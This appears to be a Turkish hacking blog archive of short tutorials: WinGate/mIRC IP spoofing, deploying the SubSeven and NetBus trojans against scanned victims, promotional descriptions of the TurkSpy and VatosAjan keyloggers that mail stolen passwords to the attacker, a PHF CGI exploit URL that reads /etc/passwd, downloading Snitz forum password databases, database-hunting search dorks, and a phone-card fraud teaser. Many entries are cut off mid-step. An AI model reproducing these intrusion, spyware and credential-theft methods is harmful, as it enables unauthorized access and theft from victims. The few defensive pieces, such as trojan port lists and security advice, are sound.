9 Kasım 2011 Çarşamba

Acronis Snap Deploy 3: Deploying to Dissimilar Hardware with Acronis Universal Deploy

Bu makale:

Acronis Snap Deploy 3 for PCs
Acronis Snap Deploy 3 for Servers
Acronis Universal Deploy Windows Donanım Soyutlama Katmanı ( Hal.dll ) değiştirilmesine izin
verir ve  sisteme yığın depolama önyükleme aygıt sürücülerini bir modüldür.

22 Ağustos 2011 Pazartesi

WinGate ile IP Spoofing


Wingate ile IP spoofing.


Esasında wingate 1 den fazla bilgisayarın bir internet bağlantısını kullanmasını sağlamak için kullanılır. Örnek: internet cafeler.
Biz winGate in telnet çıkışını kullanacağız.(port 23) Bir wingate server da yani wingate yüklğ ve çalışmakta olan makinede 23. port a telnet çektiğinizde şu cevabı alırsınız.

WinGate>

Bu komut satırında komutlar vererek başka yerlere bağlanmak mümkündür. Tabi buradan bağlandığımız
makinelerde bizim değil bağlandığımız wingate server in ip sini göreceklerdir.

Aşama -1- Bir wingate server i bulma:

Bunun için en temiz yol domain scanner yada gate scanner adi verilen programlardan kullanmak ve böylece kendi serverlarımızı bulmaktır. Piyasada dışarıya açık olduğu bilinen yüzlerce server vardır ama bunları kullanmanızı tavsiye etmem çünkü herkes onlara yüklendiği için bunlardan spoofladığınızda lag a girersiniz. Tavsiyem GateScan programı. Bu program verilen ip aralıklarında seçilmiş bir port un açık olup olmadığını; eğer açıksa belli bir cevabı(recieve string) verip vermediğini kontrol eder. Normal durumda, siz değiştirmediğiniz sürece(halimize bak bir default lafı kullanmayacağız diye kendimizi paralıyoruz) port 23 ve receive string WinGate> dir yani wingate serverlarını tespit etmeye hazırdır. En üstteki kutuya bir ip yazdığınızda örneğin 194.54.48.63 olsun 194.54.48.0 dan başlayarak 194.54.48.255 e kadar hepsinin 23. portuna bağlanacak WinGate> cevabini verip vermediklerini kontrol edecektir.Tavsiyem irc ye girin millete dns çekin gelen ip leri buraya yazın. En güzel serverlar Böyle Geçici ip lerden çıkar ama 2 saat sonra ne olacağını bilemezsiniz. Emin olmak isterseniz sitedeki wingate listesindeki server ları kullanın.

Şimdi wingate ip lerimiz hazır diyelim. Mesela ip miz 195.33.226.5 olsun. Spooflayacağımız server da irc.emu.edu.tr olsun.

mIRC yi açın.

/server 195.33.226.5:23 ----------->bu komutla sanki bir irc server a bağlanır gibi wingate server a bağlanıyoruz. Aynı şekilde isterseniz add server ile listenize de ekleyip sonra bu server lara direkt connect te edebilirsiniz.

Bir sürü yazılar gelecektir look up failed falan filan gibi onları hiç takmayın. WinGate> demesini bekleyin......

WinGate> deyince

/quote irc.emu.edu.tr:6667 ---->Bu komutla irc server a o server dan atlıyoruz.

Yine bir sürü şey çıkacaktır. Onları da iplemeyin ....
Mühim olan "irc.emu.edu.tr Connected" demesi. Bunu görünce

/quote user xxxxx xxxxx mail@adresiniz.com xxxxx --> bu xx lerin veya mail in oldu yerde ne yazdığı mühim değildir. Bunlar millet size whois çektiğinde görünecek yazılardır. İstediğinizi yazabilirsiniz mühim olan kelime sayısının aynı olması.

/quote nick isminiz

Bundan sonra bekleyin her zaman olduğu gibi irc de olmanız gerekir. Eğer olmazsa başka serverlar deneyin. Girdiğiniz zaman kendinize /whois ve /dns cekerek spoof unuzu deneyebilirsiniz.

2 Ağustos 2011 Salı

Sitelerin CGI/BIN Açıklarını Bulmak

a- (Phf scripti): 

Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'in kullandığı cgi-bin güvenlik açığı:

Sitenin Mail Listesi Açığını Bulmak

Sitelerin güvenliğini sağlamanın en iyi yollarından birisi eğer var ise sitenin açığını bulmak ve ona karşı önlem almaktan geçiyor.

Peki sitenizin mail listesinin çalınmasına karşı ne gibi önlemler alabilirsiniz. Bazen ise hackerlar kurban siteler bulur ve açıklarını bulduktan sonra site sahiplerini bilgilendirirler.

Şimdi anlatıma geçelim. Tabi ki tüm sitelerde geçerli değil ama bir kısmında etkili olabilir. Genelde her hack modeli böyledir zaten.

Yöntem nasıl kullanılır;
1.Aşama (Kurban siteyi bulma)

Açığı bulunacak sitenin bulunması tabi ki hackerların dostu olan Google'dan yapacağız. İsterseniz başka bir arama motoru da kullanabilirsiniz çünkü genelde herkes burayı kullandığı için pek verim alamayabilirsiniz. Yani ortalıkta aradığınız siteyi bulamayabilirsiniz.



Spoofing

- Ip Spoofing
Ip spoofing'i öğrenmeden önce bilmeniz gerekenler:
·         Spoof yapmak oldukça zor bir iştir.Bunun için açık kaynaklı işletim sistemlerini,tcp/ip'yi,kernelleri ve socket programlayı çok iyi bilmeniz gerekiyor.
·         Spoofing bir takım önlemlerle engellenebilir.(Kevin Mitnick'in yakalanması buna çok iyi örnektir.)
·         Spoofing ustalık gerektiren ama oldukça iyi bir ataktır.Spoofing yaparak bir servera kullanıcı adı ve şifreye sahip olmadan bağlanabilirsiniz.  

Bir çok kullanıcı ip spoofingin ip değiştirilmek anlamına geldiğini düşünür.Bu doğru değildir ve ilerde öğreneceğiniz gibi yapması çok zordur(bende öyle düşünüyordum ta ki 2001 ekimine kadar(bunun ne olduğunu ilerki dökümanlarımda anlatacağım.Ufak bir ipucu vereyim :);internetten çıkmadan ipinizi değiştirme yolu :))).

SubSeven Kullanımı

Bu bölümde subseven trojanının kullanımını ayrıntılı bir şekilde anlatacağım. Öğrendiğiniz bu bilgileri kesinlikle kötü amaçlar için ve başkalarının bilgisayar larına zarar vermek için kullanmayın. Çünkü bunu yapmakla elinize hiçbir şey geçmez. Aksine başınız çok büyük belaya bile girebilir. İlk önce Subseven ın son sürümü olan defcon8 editionı download etmelisiniz

subseven v1.0 ve v1.1 remover

NOTE: You should print this page for reference before starting.Step one is to go to your Start menu, click Shutdown, and select "Restart the computer in MS-DOS mode", then click ok.
When you do this, you should be in MS-DOS looking at a c:\windows\ prompt.
This version places itself at C:\windows\SysTrayIcon.Exe

Subseven Nedir? Nasıl Kullanılır?

subseven nedir? nasıl kullanılır?   Subsevenı cekince 3 tane dosya gelecektır. Bunlar Subseven.exe Editserver.exe ve  server.exe dir. Bu dosya lardan Server.exe yi kesinlikle kendi bilgisayar ınızda  açmamanız gerekiyor. Aksi takdirde kendi kendinizi infecte etmiş olursunuz ve trojan  sizin bilgisayarınıza yerleşir. Önce subseven.exe ye tıklıyoruz. Karşımıza subseven  ın açılış menüsü geliyor. Şimdi Subseven trojanı bulaşmış bilgisayarları bulmaya  çalışacağız. Connection Bölümüne tıklıyoruz ve çıkan menuden ip scanner ı seçiyoruz.  Burada start ip ve end ip aralığına Türkiyedeki internet servis sağlayıcılardan  birinin ip aralığını yazıyoruz. Daha sonra port kısmına subseven in portu olan  27374 ü yazıyoruz. Delay sayısını yükseltirsek

SubSeven

SubSeven
[t a n ı m]
SubSeven'ı uzaktan yonetim icin veya hackıng programı olarak kullanabilirsiniz. Zip dosyasının icinde iki tane program var bi tanesi server.exe bunu kurbanın bilgisayarında calıstırmalısınız netbustan filan girip upload edebilirisiniz. Sebseven.exe ise esas program her seyi bu program sayesinde yapacaksınız...
[ n a s ı l c a l ı s ı y o r ]
Kullanımı basit bi trojan. Kurban bilgisayarda server.exeyi calıstırıyorsunuz, gostermelik bi hata mesajı belirecek [soyle: error loading system resources]. bundan sonra program kendini otomatik hardiske kuracak, ve windows her acıldıgında oda acılacak. SubSeven.exe anaprogram netbus gibi bi sey her seyi bundan yapacaksınız.

TCP/IP

TCP/IP
Bu bölümde TCP/IP protokolüne yer verilmiştir basit örneklerle TCP/IP protokolü anlatılmıştır. TCP/IP Internet iletişiminin kalbi olduğu için bunu anlamadan internet güvenliğinden bahsetmek yanlış olur.
Evet Arkadaşlar...
1. TCP/IP
1.1- Nedir TCP/IP
1.2- TCP/IP'nin İşleyişi
1.2.1 Protokoller
Ağ seviyesi protokolleri
1.3- TCP/IP ile Otel Telefon Sistemi arasındaki ilişki
Internetin belkemiği olan TCP/IP ile ilgili bazı temel bilgileri bilmeden ne dönüp bittiğini anlamak zordur. Bu yüzden internet savaşları konusunda ayrıntıya girmeden önce kısaca TCP/IP protokolüne değinmek istedim.
Bu konuda kısaca TCP/IP'nin ne olduğunu ve nasıl çalıştığını göreceğiz. Burda verilen bilgiler temel düzeydedir ve ileride göreceğimiz konuları daha kolay anlamanıza yardımcı olacaktır.

Cmd komutları

ping 192.168.0.2 ===> ip deki diger bilgisayara ufak veri paketleri gönderip, alarak baglantiyi test eder
ping client98
ping -a 192.168.0.2 ===> ip deki diger bilgisayara ufak veri paketleri gönderip, alarak baglantiyi test eder. "-a" parametresi ile ipdeki bilgisayarin adresi görüntülenir.
ping -a -n 20 192.168.0.2 ===> -n parametresinin yanindaki deger kadar veri paketleri gönderilirilerek test edilir.
pathping ===> bu komut sayesinde routerlar üzeriden geçen verinin kayba uğayıp uğamadığı kontrol edilir.
ipconfig ===> bilgisayarin agdaki ip adresini gösterir.

TELEKOMUN TELEFON KARTLARIYLA DİLEDİĞİNİZ KADAR KONUŞUN!!!!

Eh telekom zam yaptıkça ünü bu gibi konularda ayyuka çıkmış Türk milleti de durmadı ve tabiiki de bu işi bedava ve kolayca halletmenin yolunu buldu. Bu yazıda anlatılanlar sadece ve sadece bilgi amaçlı olup aslında telefon kartlarının tekrar kullanılma yollarını değil Türk milletinin ne kadar akıllı olduğunu göstermek amacıyla yazılmıştır.

Telekom Hack

BU YAZI BİLGİ EDİNMENİZ İÇİN YAYINLANMIŞTIR.UYGULANMASI SUÇ TEŞKİL EDEBİLİR.

TELEFONLARI BELE$ KULLANMAK!Evet sevgili arkadaslar. Sonunda telefon kartim bitti diye uzulmiyeceksiniz. Elinizde bulunan tek konturluk kartla bile sabaha kadar konusmak mumkun :)

Bunu yapmak icin neler gerekli:

Telnet Komutları

Burdaki komutlar Netbus'ı kullanmayı sevmeyenler icin telnetten netbus komutları..Sahsen ben netbus kullanmıyorum..

AppRedir;(path:\filename.exe); : İe uzerinden program calistirir. c:\command.com;100

CaptureScreen : Ekrandan goruntu alır

DelFile;(filename.exe) : Dosya siler

DisableKeys;1;(keys) : harfleri iptal eder [kullanıcı klavyeyi kullanamaz]

DisableKeys;0; : Klavye tekrar aktif olur

Telnet Portları

discard........................ 9

netstat .........................15

chargen....................... 19

ftp............................... 21

telnetd......................... 23

Trojan İsimleri

'''Badtrans, beagle, blaster, blugbear, elkern, ganda, k lez, mimail, mydoom, nachi, netsky, nimda, opas, parite, s asser, scold, sircam, sober, sobig, swen, yaha, zafi'''

Trojan Kullanmadan Başkasının Bilgisayarına Girmek

BASKASiNiN BiLGiSAYARiNA GiRMEK   BASKASiNiN BiLGiSAYARiNA GiRMEK : Baskalarinin bilgisayarina girme ve internet sifrelerini calma olaylari nasil olur. ilk olarak bu olaylari gerceklestirmek icin 4 adet programa ihtiyacimiz var... Wingate, Netbus,Bo, Telnet (her windowsun icinde vardir)... Diger programlari hack download bolumunden rahatlikla bulabilirsiniz  ilk olarak irc'de kendimize bir kurban secip, ip numarasini aliyoruz (/dns nickname).. Sonra wingate'i calistiriyoruz... "Hostname or Ip" yazan yere kurbanimizin ip numarasini giriyoruz... "Scan Port" kisminda 23 seklindeki rakamlari 12345 yapiyoruz sonra asagidan 3. secenek olan try to open the port only" i secerek "scan!" butonuna basiyoruz.. "Servers found" kisminda bir kac tane ip yazmasi lazim sansa bir tanesini secin... Sonra netbus'i (eger netbus kullanmayi bilmiyorsan Hemen Ögrenmeye Çalis.) calistirip hostname/ip yazan yere wingateden buldugunuz IP'yi yazin...

Bazı Trojanlar ve kullandıkları portlar !

TROJENLER VE KULLANDIKLARI PORTLAR

port 21 - Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash
port 23 - Tiny Telnet Server (= TTS)
port 25 - Ajan, Antigen, Email Password Sender, Haebu Coceda (= Naebi), Happy 99, Kuang2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
port 31 - Agent 31, Hackers Paradise, Masters Paradise
port 41 - DeepThroat
port 59 - DMSetup
port 79 - Firehotcker
port 80 - Executor, RingZero

TurkSpy Agent Beta v1.7

TurkSpy Agent Beta v1.7Not: MiniFMOD.dll turkspy ile aynı klasörde olmak zorundadır..
++++++++++++++++++++++++++++++++++++++
TurkSpy Agent Pc de kayıtlı bulunan şifreleri almak ve klavye ile basılan tuşları okuya bilmek adına tasarlanmıştır..
TurkSpy Agent şifreleri almak ve klavyede basılan tuşları göndermek yanında ayrıca dosya yöneticisi ve registry editör bulundurmaktadır.
Pc ye baglanıp istediginiz dosyayı çekebilir dosya yükleye bilir, dosya çalıştırabilirsiniz..
Registry editör ile kurbanın Kayıt defterinde istediginiz işlemleri yapabilirsiniz..
Uygulama yöneticisi ile belirlediginiz exe yi kapata bilirisniz.

UIN HACK & SECURITY

Special şanks to:Chevalier
Bu ay sizlere ınternet'de hepimizin gözü kulağı olan vazgeçilmez Icq programında istediğiniz Uin'i almanın ve Uin'inizi korumanın yöntemlerini göstermeye çalışacağım. Düşünsenize yıllardır kullandığınız Uin'iniz bir gün nete girdiğinizde sizden password soruyor.(!) Bir kaç denemeden sonra vazgeçip yeni bir uin alıyorsunuz. O da nesi?? eski kimliğiniz yeni kimliğinizi add ediyor. Eski infonuza baktığınızda isminizin önünde "tavuk" veya "lavuk" gibi bir sıfat.! :-)) Kabus gibi değil mi? Ya da şunu düşünün ; Uin'iniz birbirine benzemeyen anlamsız rakamlardan değil de ev veya cep telefon numaranızdan oluşuyor. Ne kadar karizmatik ! Ya da olayı abartıp sonu beş-alti sıfırla biten bir uin'e ne dersiniz?? mesela 10000000 bence hiçkimse böyle bir teklife hayır demez. Sizlere istediğiniz uinleri elde edip dağıtacak değilim.. Ne demiş Konfiçyus (umarım bir başkası söylememiştir) "Bir insana balık vereceğine ona balık tutmayı öğret."

UIN HACK & SECURITY 2

Selamlar. Önceki yazımda başladığım uin hack ve security konusuna göstermiş olduğunuz ilgiden dolayı çok teşekkürler. Benden uin isteyen arkadaşlara elimden gelen yardımı yapmaya çalıştım. Ancak hiç kimseye hiçbir şey karşılığında (para da dahil) uin veremeyeceğimi bir kez daha belirtmek istiyorum.
Yazımın ilk bölümünde uin güvenlik açıklarının üç temel boyutunun iki tanesinden söz etmiştim. Bunlardan ilki dikkatsiz ve özensiz şifre seçimiydi. Diğer güvenlik açığı ise Primary e-mail kısmına yazılan e-mail adresinin Mirabilis tarafından kayıp şifrelerin gönderildiği adres olarak kullanılmasından kaynaklanıyordu. Şimdi e-mail açıkları ile ilgili birkaç konuya daha değinerek bu boyutu da tamamlayacağız.

Unicode Açığı

Unicode Açığı
Şimdi mantık şu Winnt sistemlerde bulunan cmd.exe root.exe sayesinde kendinizi o sistemin içine yollarsınız


şimdi sisteme girmek için bazı dosyaları kullancaz

Cmd.exe
Root.exe

Ünlü Hackerlar

Ünlü Hackerlar

Richard Stallman
Takma Adı:
Yok (saklayacak bir şey yok ki!)

Nasıl şöhret oldu ?
Eski hacker'lardan Stallman, 1971'de MIT'in yapay zeka laboratuvarında işe girdi. O sıralarda Harvard Üniversitesi'nde öğreciydi. Geliştirdiği yazılımın, kişisel haklara saldırıda kullanıldığı görüldü. Stallman, daha sonraları Free Software Foundation'u (Bedava Yazılım Vakfı) kurdu.

Bilgisayarla nasıl tanıştı ?
1969 yılında, IBM'nin New York Bilim Merkezi'nde. O zamanlar, 16 yaşındaydı.

İlginç notlar:
Stallman, 1980'lerin başında MIT ile kadrolu olarak çalışmayı bıraktı; fakat oradaki bir ofiste çalışmalarını sürdürmeye devam etti. O sıralarda GNU adında yeni bir işletim sistemi geliştirdi.

TurkSpy v1.8 Beta

++++++++++++++++++++++++++++++++++++++
TurkSpy Pc de kayıtlı bulunan şifreleri almak ve klavye ile basılan tuşları okuya bilmek adına tasarlanmıştır..
TurkSpy şifreleri almak ve klavyede basılan tuşları göndermek yanında ayrıca dosya yöneticisi ve registry editör bulundurmaktadır.
Pc ye baglanıp istediginiz dosyayı çekebilir dosya yükleye bilir, dosya çalıştırabilirsiniz..
Registry editör ile kurbanın Kayıt defterinde istediginiz işlemleri yapabilirsiniz..
Uygulama yöneticisi ile belirlediginiz exe yi kapata bilirisniz.
++++++++++++++++++++++++++++++++++++++
TurkSpy Bilgileri Mail adresinize yollamaktadır ve bunu kesinlikle yapmaktadır.
Benim mailim hotmail yada gmail .. bana yollamıyor gibi bir mazeret asla olmaz.

Vatos Ajan Tanıtım

VatosAjan 2.4 Hakkında;
VatosAjan bulaştığı bilgisayarın özelliklerini,kurbanın şifre ve keylog kayıtlarını mailinize gönderen
Bünyesinde bulunan FTP Server ile kurbanın bilgisayarına bağlanılabilen,Sadece VatosAjan'da bulunan
WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin kurbanın bilgisayarında
dosya arama,dosya silme,istediğiniz dosyaları mailinize gönderme,
downloader gibi çalışıp, istediğiniz dosyaları internetten indirip çalıştırabilme,
mail adresinizi değiştirebilme,registry kayıtlarına ulaşabilme ve kendisini silme emirlerini
uygulayabilecek interaktif bir casus yazılımdır.
VatosAjanın alabildiği şifreler aşağıda yazılmıştır.
Versiyon Farkları
-Win9x sistemlerde stabil çalışması sağlandı

Virtualave Bannerından Kurtulmanın Yolu

Isleme ilk önce sayfanin en asagisindaki <BODY> TAG i bir kaç satir yukari çikartmakla basliyalim. Ve daha sonra BODY TAG lari arasina su CODE u yazin:
</p><script language="javascript">/*
Ve daha sonra </BODY> TAG in hemen üstüne asagidaki CODE  u yazin:
*/            
</script>
Ve iste Virtualave bannerlarindan da kurtuldunuz.

Virüs Nedir?

VİRÜS NEDİR?
Virüs, genellikle başka bir dosyanın arkasına gizlenmiş ve dosya çalıştırıldığında bilgisayarda beklenmeyen ve istenmeyen olaylara neden olan programlardır. Virüs yazılımları, diğer yazılımlardan farklı olarak kötü niyetle, zarar vermesi için hazırlanmıştır. Virüsler kendilerini kopyalayabilme, çalıştığınız dosyalara sıçrayabilme ve maksatları dahilinde dosya silebilme, dosya içeriğini değiştirip çalışmaz hale getirebilme özelliğine sahiptir.Bütün bunları kullanıcının haberi olmaksızın ve hiç bir komuta gerek görmesizin yapabilmektedirler.

WEB HACK NEDIR???


WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)
Error 404
/cgi-bin/phf is not found on this server
Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor
Ama asagidaki listeyi verirse bilinki buldunuz:)))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

Web Hack Ve Exploitler

Merhaba arkadaşlar bu yazımda size Web hack hakkında bilgi vericem.

Yazıma Brute Force İle başlamak istiyorum

Brute Force İle Web Hack:

İlk başta brute forcenin mantıgı acıklıyayım:
Brute force şifreleri deneme yanılma yoluyla yapan bir attack türüdür.Neyse aşagıda biraz daha ayrıntılı anlattım.

Web Hack Yöntemleri

1-Bu olayı herkez yapabilir çok basit bir yöntem, bu yöntemle geçen haftalarda 400 e yakın üyesi olan bir forum u hackledim. En çok kullanılan 2 forum türü vardır biri Snitz diğeri ise Web Wiz Guide forum larıdır. color=#800080 www.google.com <http://www.google.com> dan bu isimleri aratıyorsunuz orda size yüzlerce forum çıkar (Web Wiz forum olarak aratın) örneğin color=#0000ff www.ahmetyigit.com/forum <http://www.ahmetyigit.com/forum> adresinin google dan buldunuz ve siteye girdiniz eğer Snitz forum ise sonuna şunları ekleyin /snitz_forums_2000.mdb <eğer adam mdb dosyasının yerini değiştirmeden sitesine attıysa bütün kullanıcı isimleri ve şifrelerini görebilirsiniz>daha sonra karşınıza bu dosyayı yüklemek istiyormusunuz diye bişey gelicek kaydet diyin ye dosyayı yükleyin. Daha sonra bilgisayarınızda Microsoft Access varsa bu dosyayı açıp o forum un bütün şifrelerinin ele geçirebilirsiniz. Geçirdiğiniz şifreler arasında admin şifreside bulunmaktadır bu sayede forum un ortasına hacked by .... yaza bilirsiniz. Yanlız bu olay bütün forumlarda olmamaktadır.

Genel Web Hack Yöntemleri Ve Güvenlik Yolları

Yazıma başlamadan önce size bazı gerçeklerden bahsetmek istiyorum. Özellikle gerçekten bilimsel anlamda bilgisayar sektörü ile ilgilenmemişseniz, bu söyleyeceklerim sizin için altın değerinde olacaktır.

1.              Kural : Hiçbir Hacker yada Saldırgan, sihirbaz değildir. Bir şekilde var olan bir açık varsa, o saldırgan, bilgi, yetenek, tecrübe ve şans kriterleri ile o açığı bulur ve kullanır. Her saldırganda bu kriterler aynı olmayacağı için bazıları için atak başarısız olur, bazılar için ise atak karşı tafa büyük hasarlar verir.
2.              Kural : Tamamiyle güvenli sistem diye birşey yoktur.
3.              Kural : Güvenlik işinde garanti yoktur.

Web Hack

Web sitelerinin Türü Çok ÖnemlidiR Hackleyeceksiniz Fakat Site Ne Tür Örneğin (Asp ? Php ? Html ? Flash ? cgi ? Vs . vs.) Hackleyeceğiniz Sitenin Kaynağını ßilmek Çok önemlidir

*Zekanız
Peki baska sekilde yapamazmiyiz bu da sizin hayal gücünüze bali
inurl:admin filetype:mdb
inurl:userpass filetype:mdb
inurl:data filetype:mdb
inurl:ftp filetype:txt

2.List Path ile database Bulma Yöntemi

Gerekli olan yani sunucunun sagladigi hostan bir yer edinirsiniz Bunu para ile
Veya kendinizde atabilirsiniz )


inurl:upload filetype:asp
veya
inurl:aspupload filetype:asp
inurl:fileload filetype:asp
Bunlar bana zehiri yedirebilecem yerleri göstereck ammada cok site var demi )

Web Hack Nedir?

WEB HACK UZERINE
WEB HACK NEDIR???
  WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:

Webjump Bannerını Kaldırmak

Webjump bannerini kaldirmak icin su adresi su sekilde girin.
diyelimki uye adiniz: yavrucuk
http://freehosting2.webjump.com/yav/yavrucuk
yada
http://freehosting1.webjump.com/yav/yavrucuk

Web Site Hacking

 Selamlar... Bu yazida daha basit ama daha hizli bir hack yontemini anlatcam
Bu yontem cok hosunuza gidecek :) Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral's Dict Maker.
--------------------------------------
Mantik : phf sistemlerde bulunan bir acikdir ve bu acik sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------

Windows Xp Boot Ekranı Degiştirmek İçin

---------------------------------------
WİNDOWS XP BOOT EKRANI DEĞİŞTİRMEK İÇİN
---------------------------------------

1. C:\\windows\\system32 klasörü altında bulunan ntoskrnl.exe dosyasını yedekleyin.
2. Masaüstünde boş bir klasör oluşturun.
3. Değiştirmek istediğiniz BOOT ekranı exe dosyasını buraya kopyalayın.
4. Dosya adını ntoskrnl.exe olarak değiştirin.
5. Bilgisayarı Güvenli Modda(Sade Mode) başlatın.
6. Kendi kullanıcı adınız ile LOGİN olun.
7. Adını değiştirdiğiniz ntoskrnl.exe dosyasını çalıştırın.
8. ntoskrnl.exe dosyasını C:\\Windows\\system32 klasörüne kopyalayın.
9. Değiştirme onayı isteyecektir evet deyin.
10. Bilgisayarı yeniden başlatın.

Wingate ile IP spoofing.

Esasinda wingate 1 den fazla bilgisayarin bir internet baglantisini
kullanmasini saglamak icin kullanilir.Ornek:internet cafeler.
Biz winGate in telnet cikisini kullanacagiz.(port 23)Bir wingate server da
yani wingate
yuklu ve calismakta olan makinada 23. port a telnet cektiginizde su cevabi alirsiniz.


Word List Nedir?

WoRD_lisT Ftp ve acc gi şifreleri ele geçirmek için kullanılan, genelde text dosyaları olan adında anlaşılacağı gibi kelime listeleridir.
Bunları kullanmak için mutlaka bir Wordlist progamına ihtiyacınız vardır..
Aynı Zamanda. Programa Wordlist dosyaları verilerek şifre kırma işlemine başlanmış olur.
Çalışma algoritmasına gelince Wordlistinizdeki şifreleri we karakreleri..Müdahele yaptığınız dosya veya ftp üzerinde tek tek dener..

Word List Hazırlama

  Selamlar. Bu bölümde de word listler yani cracker programlarının kullandığı sözlükleri inceliyeceğiz. Word List cracker programlarının şifreleri kırmak için kullandığı alt alta yazılmış harf yada rakamlardan oluşan dosyalardır. Genelde aşırı büyük olurlar. 8 karakterlik bir wordlist 1.5 GB kadar yer kaplamaktadır. Bu dosyada şifre kombinasyonları yer alır. Jhon veya jackte bu kombinasyonları deneyerek kırma işlemini gerçekleştirir.


    Bu dosyaları hazırlamak için Meliksah arkadaşımızın yazdığı sibop kullanabilriz. Bu programı kullanmak oldukça kolay. Ama ben burada Dictionary Maker adlı programda bahsedeceğim.

KURTLAR VE ZOMBİLER

Worm’ların ve DDoS Ataklarının Hukuki İncelemesi
Copyright, Av.Ali Osman Özdilek, Montreal, Ocak 2003

24 Ocak Cuma günü her akşam olduğu gibi İnternet’e girdiğimde browserım bir türlü sayfaları açamadı. Oysa kullandığım ISS nin bağlantılarında hiç yavaşlama olmazdı. Bir terslik olduğunu anladım ve düzenli olarak ziyaret ettiğim güvenlik sitelerinden birine zor da olsa ulaşmayı başardım ve bu yavaşlamanın sebebini öğrendim.
ın Ulusal Altyapı Sistemi Koruma Merkezi ( FBI’s National Infrastructure Protection Center ) web sitesinde ( www.nipc.gov ) benzer bir uyarı yayınladı. Bu uyarıda ayrıca NIPC tarafından geliştirilen, sistem yöneticilerinin Trinoo ve TFN’yi inceleyebilmeleri amacıyla kullanabilecekleri ücretsiz bir yazılım da yer alıyordu.

XXX Site Pass Cracking

Bir siteye üye olan kullanıcıların şifresini çalmak için öncelikle o sitede minik bir araştırma yapmamız gerekir. İlk olarak üyelerin kullanıcı adlarını ve şifrelerini girdikleri yerin adresini bulacağız. Üye şifresini çalmak istediğiniz siteye girin. Orada "Üye Girişi" yada "Members" diye bir bölüm olması lazım. Ona tıklayın, büyük ihtimalle şifrenizi soran bir ekranla karşılaşacaksınız. O ekranın çıktığı adresi bir yere not edin. Adresin şöyle bir şey olması lazım:

NETBIOS SCANNER ve TROJANSIZ GİRME YOLU

Bunu yazmamın nedenı ESS. NET. TOOLS v.s nasıl kullanılır diye bir çok
kişinin sorması..Ben sıze o programı anlatmıcam. NETBIOS scannerların en
eskısı ve bence en babası olan SCANIP den bahsedıcem. Bır LArgo Mathematıcs
urunu olan cok baba bır programdır. Eskilerde bilir bunu..

ADRES:
-------
3.3MB bişey..

Kullanım:
-----------
Program calısırken sıze "Whıch LANA Do You Wısh To SCan" dıe soracaktır.Sız
(TCP/IP -Dıal Up Adapter)'a tekabul eden sayıyı sececeksınız..


Bilgisayarınıza Hacker'lar Mı Dadandı?

Son zamanlarda, IRC üzerinden karşı tarafın PC'sine bir trojan yollayarak portlarından birinde açık sağlamak ve bu portu kullanan bir program vasıtasıyla PC'ye tamamen hükmetmek tehlikeli derecede yaygın bir hal aldı. Siz IRC'de keyifle sohbet ederken bir hacker, (biz bunlara lammer diyoz..) haberiniz bile olmadan bilgisayarınızda geziniyor veya bazı şahsi bilgilerinizi çalıyor olabilir.

Bu yazımda  hack edildiğinizi anlamanın yollarından ve anlayınca bunun önüne nasıl geçebileceğinizden bahsedeceğim.